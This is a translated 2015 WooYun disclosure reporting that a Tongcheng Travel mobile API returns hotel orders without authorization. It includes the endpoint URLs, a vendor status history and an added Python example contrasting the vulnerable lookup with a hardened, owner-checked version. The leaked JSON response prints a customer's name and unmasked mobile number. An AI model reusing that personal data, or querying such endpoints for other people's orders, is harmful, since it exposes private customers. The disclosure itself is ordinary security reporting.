Tongcheng Travel (同程旅游网) mobile site: an API endpoint is accessible without authorization

ID: 149982
URL: http://www.wooyun.org/bug.php?action=view&id=149982
Status: confirmed by vendor
Title: Tongcheng Travel (同程旅游网) mobile site: an API endpoint is accessible without authorization
Type: unauthorized access / permission bypass
Vendor: Suzhou Tongcheng Travel Network Technology Co., Ltd. (苏州同程旅游网络科技有限公司)
White hat: 1937nick
Submitted: 2015-10-28 09:48:00
Published: 2015-12-12 09:58:00
Fixed: (not set)
Confirmed: 2015-10-28 00:00:00
Confirm Spend: 0
Tags: sensitive interface lacking authentication
Followers: 0
Bookmarks: 0
White-hat rating: self-assessed rank 3
Vendor rating: rank 5
Summary
Mom: said the title can't be too
A high rank and a JD gift card would be fine.
Details

Vulnerable location: URL: http://tcmobileapi.17usoft.com/Movie/default.aspx

[Screenshot: 1.png]

Let's test the hotel API endpoint: http://tcmobileapi.17usoft.com/hotel/orderhandler.ashx

"response":
{
"header":
{
"rspType":"0",
"rspCode":"0000",
"rspDesc":"查询成功"
},
"body":
{
"serialId":"hh55bddu67210024u610",
"orderFlag":"未入住",
"hotelId":"2111",
"hotelName":"北京丽苑公寓",
"hotelLinkPhone":"010-65258855",
"roomName":"敞开式套房",
"address":"王府井金鱼胡同18号近校尉胡同",
"totalPrice":"1680.00",
"realTotalPrice":"1680",
"comeDate":"2015-08-02",
"leaveDate":"2015-08-03",
"creationTime":"2015/8/2 17:09:59",
"rooms":"1",
"comeTime":"18:00",
"contactName":"7990862870D539A4",
"contactMobile":"13536848017",
"theNewContactMobile":"135****8017",
"guestName":"恩旺",
"guestMobile":"13536848017",
"theNewGuestMobile":"135****8017",
"otherGuests":"",
"remark":"",
"isAbleComment":"0",
"isGuarantee":"0",
"isCancelable":"0",
"isAblePay":"0",
"isCanDelete":"1",
"paymentType":"到店付款",
"guaranteeAmount":"0.00",
"couponPrice":"100.00",
"commentPrice":"0",
"invoiceName":"",
"invoiceRise":"",
"invoiceAddress":"",
"invoiceFee":"0",
"invoiceMobile":"",
"orderAmountDetailList":[
{
"amountAdvice":"1680.00",
"breakfast":"单份",
"stayDate":"20150802"
}],
"isProcess":"0",
"introduction":"",
"copywriter":"",
"commentTip":"",
"commentCashMoney":"",
"returnCashMoneyAll":"",
"isPromo":"0",
"currency":"0",
"isAbleSubmitCheckInfo":"0",
"isAbleChange":"0",
"policyId":"1401276",
"roomTypeId":"569761",
"supplierId":"74475",
"RemindCheckRoom":"0",
"RemindConfirm":"0",
"OtherGuaranteeAmount":"0.00",
"OtherCurrency":"0",
"OtherOrderPrice":"1680.00",
"platId":"",
"redEnvelopeAmount":"0"
}
}
}


[Screenshot: 2.png]
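The response above shows the two defects at once: the order handler answers anyone who supplies a serialId, and alongside the masked fields (theNewContactMobile, theNewGuestMobile) it also returns the raw phone numbers. The following Python is an added illustration written for this page, not code from the report or from Tongcheng's ASP.NET handler; the order store, the ownerUserId field, the session dict and the non-0000 response codes are assumptions. It contrasts the lookup as the report describes it with a version that requires an authenticated session, checks that the order belongs to that user, and returns only the masked numbers.

```python
import copy
import json
from typing import Optional

# Constructed sample order store modelled on the field names of the leaked
# response; every value here is made up and is not the real record.
ORDERS = {
    "hh55bddu67210024u610": {
        "ownerUserId": "u-1001",          # assumed: the account that placed the order
        "orderFlag": "未入住",
        "hotelName": "Example Hotel",
        "totalPrice": "1680.00",
        "contactName": "Example Contact",
        "contactMobile": "13500001234",
        "guestName": "Example Guest",
        "guestMobile": "13500005678",
    }
}

# Fields that must never leave the server unmasked.
RAW_MOBILE_FIELDS = ("contactMobile", "guestMobile")


def mask_mobile(number: str) -> str:
    """Mask a mobile number the way the site's own theNew* fields do: 135****8017."""
    if len(number) < 7:
        return "*" * len(number)
    return number[:3] + "****" + number[-4:]


def response(code: str, desc: str, body=None) -> dict:
    """Build a reply in the header/body shape used by the endpoint above."""
    return {"header": {"rspType": "0", "rspCode": code, "rspDesc": desc},
            "body": body}


def lookup_order_vulnerable(serial_id: str) -> dict:
    """The behaviour the report describes: whoever supplies a serialId gets
    the whole record, raw phone numbers included, with no session check."""
    order = ORDERS.get(serial_id)
    if order is None:
        return response("9999", "order not found")  # code is an assumption
    return response("0000", "查询成功", copy.deepcopy(order))


def lookup_order_hardened(serial_id: str, session: Optional[dict]) -> dict:
    """Same lookup with the two checks the endpoint lacked:
    1. the caller must present an authenticated session;
    2. the order must belong to that session's user.
    Raw mobile numbers are replaced by the masked theNew* variants."""
    if not session or not session.get("userId"):
        return response("1001", "authentication required")  # codes are assumptions
    order = ORDERS.get(serial_id)
    # One answer for "no such order" and "not your order", so an authenticated
    # caller cannot use the reply to confirm that someone else's serialId exists.
    if order is None or order["ownerUserId"] != session["userId"]:
        return response("1003", "order not found or not owned by caller")
    body = {k: v for k, v in order.items()
            if k != "ownerUserId" and k not in RAW_MOBILE_FIELDS}
    body["theNewContactMobile"] = mask_mobile(order["contactMobile"])
    body["theNewGuestMobile"] = mask_mobile(order["guestMobile"])
    return response("0000", "查询成功", body)


if __name__ == "__main__":
    sid = "hh55bddu67210024u610"
    print(json.dumps(lookup_order_vulnerable(sid), ensure_ascii=False, indent=1))
    print(json.dumps(lookup_order_hardened(sid, None), ensure_ascii=False, indent=1))
    print(json.dumps(lookup_order_hardened(sid, {"userId": "u-1001"}),
                     ensure_ascii=False, indent=1))
```

The masking mirrors what the endpoint already did for theNewContactMobile; the point of the hardened version is that the raw contactMobile and guestMobile fields are dropped from the body entirely rather than sent alongside the masked copies.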


For what to test, see this earlier report: http://wooyun.org/bugs/wooyun-2010-0137596
I won't test it again; it was fixed last time, and this is now the third time.

POC

http://wooyun.org/bugs/wooyun-2010-0137596

Fix

Fortunately I have done development work myself: delete the debugging page.

Status history
2015-10-28: details sent to the vendor, awaiting vendor handling
2015-10-28: confirmed by the vendor; details visible to the vendor only
2015-11-07: details opened to core white hats and domain experts
2015-11-17: details opened to regular white hats
2015-11-27: details opened to intern white hats
2015-12-12: details opened to the public
Vendor reply: Thank you for your attention to Tongcheng Travel.
Vendor response: severity: low; vulnerability rank: 5; confirmed: 2015-10-28 09:56